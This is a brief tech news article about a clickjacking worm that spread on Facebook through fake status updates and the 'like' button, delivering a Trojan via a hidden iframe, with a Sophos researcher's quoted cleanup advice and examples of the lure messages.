Facebook users get, 'like', infected

Clickjacking serves Trojan

Thousands of PCs have reportedly been infected with a Trojan delivered through a Facebook exploit, according to a security firm.

The clickjacking attack exploits Facebook’s ‘like’ function and spreads using fake status updates.

Sophos chief technical officer, Graham Cluely, wrote on his blog that the worm had spread quickly over the social networking site last weekend.

“Visiting users are tricked into ‘liking’ a page without necessarily realising they are recommending it to all of their Facebook friends,” Cluely wrote.

“If you believe you may have been hit by this attack, view the recent activity on your news feed and delete entries related to the above links. Furthermore, you should view your profile, click on your Info tab and remove any of the pages from your ‘likes and interests’ section.”

Users who follow the status update link are taken to a visibly blank page where a further link, once clicked, will deliver the Trojan/iframe-ET via a malicious hidden iFrame.

Cluely wrote that the bogus status updates include:

“LOL This girl gets OWNED after a POLICE OFFICER reads her STATUS MESSAGE." "This man takes a picture of himself EVERYDAY for 8 YEARS!!" "The Prom Dress That Got This Girl Suspended From School." "This Girl Has An Interesting Way Of Eating A Banana, Check It Out!"

The attack is similar to the Fbhole worm, that stung Facebook users in May.

Security researcher Narkolayev Shlomi detailed how the clickjacking attack works earlier this year.

Join the newsletter!

Error: Please check your email address.

Tags sophossecurityFacebook

More about ARSFacebookSophos

Show Comments

Market Place